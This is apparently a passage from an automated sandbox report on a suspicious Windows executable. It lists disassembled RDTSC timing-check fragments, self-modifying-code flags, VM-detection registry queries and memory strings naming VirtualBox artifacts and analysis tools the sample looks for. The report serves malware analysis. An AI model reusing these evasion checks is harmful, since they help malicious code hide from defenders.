    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00A60 second address: 6F00AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 call 00007FB418AEFE51h 0x0000000a pushfd 0x0000000b jmp 00007FB418AEFE50h 0x00000010 jmp 00007FB418AEFE55h 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 mov dword ptr [esp], eax 0x0000001b jmp 00007FB418AEFE57h 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 jmp 00007FB418AEFE56h 0x00000028 nop 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FB418AEFE57h 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00AEC second address: 6F00AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00AF2 second address: 6F00B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB418AEFE58h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B17 second address: 6F00B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B26 second address: 6F00B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE54h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B3E second address: 6F00B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B42 second address: 6F00B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B51 second address: 6F00B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00B55 second address: 6F00B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00BAA second address: 6F00BCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 push ebx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00BCA second address: 6F00CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 742B0D1Dh 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007FB48716E931h 0x00000014 jmp 00007FB418AEFE54h 0x00000019 mov eax, dword ptr [ebp-0Ch] 0x0000001c jmp 00007FB418AEFE50h 0x00000021 mov dword ptr [esi+04h], eax 0x00000024 pushad 0x00000025 call 00007FB418AEFE4Eh 0x0000002a pushfd 0x0000002b jmp 00007FB418AEFE52h 0x00000030 xor cl, 00000038h 0x00000033 jmp 00007FB418AEFE4Bh 0x00000038 popfd 0x00000039 pop eax 0x0000003a mov si, bx 0x0000003d popad 0x0000003e lea eax, dword ptr [ebx+78h] 0x00000041 jmp 00007FB418AEFE4Bh 0x00000046 push 00000001h 0x00000048 jmp 00007FB418AEFE56h 0x0000004d nop 0x0000004e jmp 00007FB418AEFE50h 0x00000053 push eax 0x00000054 jmp 00007FB418AEFE4Bh 0x00000059 nop 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007FB418AEFE54h 0x00000061 adc si, B858h 0x00000066 jmp 00007FB418AEFE4Bh 0x0000006b popfd 0x0000006c popad 0x0000006d lea eax, dword ptr [ebp-08h] 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 mov cl, 02h 0x00000075 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00CB2 second address: 6F00D09 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB418E0AE83h 0x00000008 or ax, BBCEh 0x0000000d jmp 00007FB418E0AE89h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, si 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB418E0AE89h 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00E1A second address: 6F00E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00E1E second address: 6F00E24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00E24 second address: 6F00E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE56h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00E3E second address: 6F00E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007FB418E0AE87h 0x00000010 lea eax, dword ptr [ebx+70h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB418E0AE85h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00E7A second address: 6F00EDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB418AEFE57h 0x00000009 jmp 00007FB418AEFE53h 0x0000000e popfd 0x0000000f movzx esi, dx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push 00000001h 0x00000017 pushad 0x00000018 mov dx, F744h 0x0000001c mov edi, 71FB43B0h 0x00000021 popad 0x00000022 push ecx 0x00000023 jmp 00007FB418AEFE54h 0x00000028 mov dword ptr [esp], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00EDA second address: 6F00EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00EDE second address: 6F00EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F00FB4 second address: 6F01019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FB418E0AE86h 0x00000010 js 00007FB48748953Eh 0x00000016 jmp 00007FB418E0AE80h 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB418E0AE87h 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01019 second address: 6F010BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FB418AEFE4Eh 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FB418AEFE4Eh 0x0000001a and ecx, 00F842E8h 0x00000020 jmp 00007FB418AEFE4Bh 0x00000025 popfd 0x00000026 mov ah, 9Ah 0x00000028 popad 0x00000029 mov edx, 756006ECh 0x0000002e pushad 0x0000002f mov di, si 0x00000032 popad 0x00000033 sub eax, eax 0x00000035 jmp 00007FB418AEFE4Fh 0x0000003a lock cmpxchg dword ptr [edx], ecx 0x0000003e jmp 00007FB418AEFE56h 0x00000043 pop edi 0x00000044 jmp 00007FB418AEFE50h 0x00000049 test eax, eax 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F010BC second address: 6F010C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F010C0 second address: 6F010DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F010DD second address: 6F01153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 67ABB802h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FB48748946Ah 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB418E0AE82h 0x00000018 and si, FF98h 0x0000001d jmp 00007FB418E0AE7Bh 0x00000022 popfd 0x00000023 mov di, cx 0x00000026 popad 0x00000027 mov edx, dword ptr [ebp+08h] 0x0000002a pushad 0x0000002b push ecx 0x0000002c mov dx, 6512h 0x00000030 pop edx 0x00000031 pushfd 0x00000032 jmp 00007FB418E0AE88h 0x00000037 add cx, 0128h 0x0000003c jmp 00007FB418E0AE7Bh 0x00000041 popfd 0x00000042 popad 0x00000043 mov eax, dword ptr [esi] 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 mov ebx, ecx 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01153 second address: 6F011C0 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ch, 0Dh 0x00000009 popad 0x0000000a mov dword ptr [edx], eax 0x0000000c jmp 00007FB418AEFE55h 0x00000011 mov eax, dword ptr [esi+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB418AEFE53h 0x0000001d add eax, 6795607Eh 0x00000023 jmp 00007FB418AEFE59h 0x00000028 popfd 0x00000029 call 00007FB418AEFE50h 0x0000002e pop eax 0x0000002f popad 0x00000030 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F011C0 second address: 6F011C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F011C6 second address: 6F011CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F011CA second address: 6F012AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e pushad 0x0000000f movzx esi, dx 0x00000012 pushfd 0x00000013 jmp 00007FB418E0AE83h 0x00000018 and ch, FFFFFFEEh 0x0000001b jmp 00007FB418E0AE89h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+08h] 0x00000025 pushad 0x00000026 mov di, si 0x00000029 pushad 0x0000002a push ecx 0x0000002b pop edi 0x0000002c push eax 0x0000002d pop edi 0x0000002e popad 0x0000002f popad 0x00000030 mov dword ptr [edx+08h], eax 0x00000033 jmp 00007FB418E0AE7Ch 0x00000038 mov eax, dword ptr [esi+0Ch] 0x0000003b jmp 00007FB418E0AE80h 0x00000040 mov dword ptr [edx+0Ch], eax 0x00000043 jmp 00007FB418E0AE80h 0x00000048 mov eax, dword ptr [esi+10h] 0x0000004b jmp 00007FB418E0AE80h 0x00000050 mov dword ptr [edx+10h], eax 0x00000053 jmp 00007FB418E0AE80h 0x00000058 mov eax, dword ptr [esi+14h] 0x0000005b jmp 00007FB418E0AE80h 0x00000060 mov dword ptr [edx+14h], eax 0x00000063 jmp 00007FB418E0AE80h 0x00000068 mov eax, dword ptr [esi+18h] 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F012AB second address: 6F012AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F012AF second address: 6F012B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F012B5 second address: 6F012BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F012BB second address: 6F012BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F012BF second address: 6F0132B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+18h], eax 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007FB418AEFE4Ah 0x00000017 jmp 00007FB418AEFE55h 0x0000001c popfd 0x0000001d popad 0x0000001e mov eax, dword ptr [esi+1Ch] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FB418AEFE56h 0x0000002a or esi, 2AEAE0D8h 0x00000030 jmp 00007FB418AEFE4Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0132B second address: 6F01382 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB418E0AE7Ch 0x00000013 or cl, 00000068h 0x00000016 jmp 00007FB418E0AE7Bh 0x0000001b popfd 0x0000001c call 00007FB418E0AE88h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01382 second address: 6F01391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+20h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01391 second address: 6F01395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01395 second address: 6F0139B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F0139B second address: 6F013B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F013B3 second address: 6F013B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F013B7 second address: 6F013D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F014CD second address: 6F014D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F014D3 second address: 6F014F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+34h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F014F4 second address: 6F014F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F014F8 second address: 6F01515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01515 second address: 6F01594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FB418AEFE59h 0x00000015 popad 0x00000016 test ecx, 00000700h 0x0000001c pushad 0x0000001d jmp 00007FB418AEFE4Ch 0x00000022 mov bl, al 0x00000024 popad 0x00000025 jne 00007FB48716DFFCh 0x0000002b jmp 00007FB418AEFE4Dh 0x00000030 or dword ptr [edx+38h], FFFFFFFFh 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB418AEFE58h 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01594 second address: 6F01598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F01598 second address: 6F0159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F50CBF second address: 6F50CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov esi, 2167C8FBh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6F50CD7 second address: 6F50D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movzx eax, bx 0x0000000f pushfd 0x00000010 jmp 00007FB418AEFE57h 0x00000015 or ah, FFFFFF8Eh 0x00000018 jmp 00007FB418AEFE59h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF062C second address: 6EF0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF0630 second address: 6EF0636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF0636 second address: 6EF063C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF063C second address: 6EF0640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF0640 second address: 6EF0644 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF0644 second address: 6EF0673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dl, FEh 0x0000000e pushfd 0x0000000f jmp 00007FB418AEFE50h 0x00000014 add cl, FFFFFF88h 0x00000017 jmp 00007FB418AEFE4Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF0673 second address: 6EF06EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB418E0AE81h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FB418E0AE7Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FB418E0AE7Dh 0x00000020 add al, FFFFFFB6h 0x00000023 jmp 00007FB418E0AE81h 0x00000028 popfd 0x00000029 jmp 00007FB418E0AE80h 0x0000002e popad 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF06EA second address: 6EF06FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6EF06FC second address: 6EF0700 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6E90008 second address: 6E9000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: 6E9000C second address: 6E90026 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Tries to evade debugger and weak emulator (self modifying code)
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSpecial instruction interceptor: First address: 884A74 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSpecial instruction interceptor: First address: A43D3A instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSpecial instruction interceptor: First address: A277A8 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeSpecial instruction interceptor: First address: AB4677 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_00409980 rdtsc 1_2_00409980
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_002229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_002229FF
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeCode function: 1_2_0022255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_0022255D
    Source: FYQ6Ee6gbS.exe, FYQ6Ee6gbS.exe, 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
    Source: FYQ6Ee6gbS.exeBinary or memory string: Hyper-V RAW
    Source: FYQ6Ee6gbS.exe, 00000001.00000003.1453047831.000000000710E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
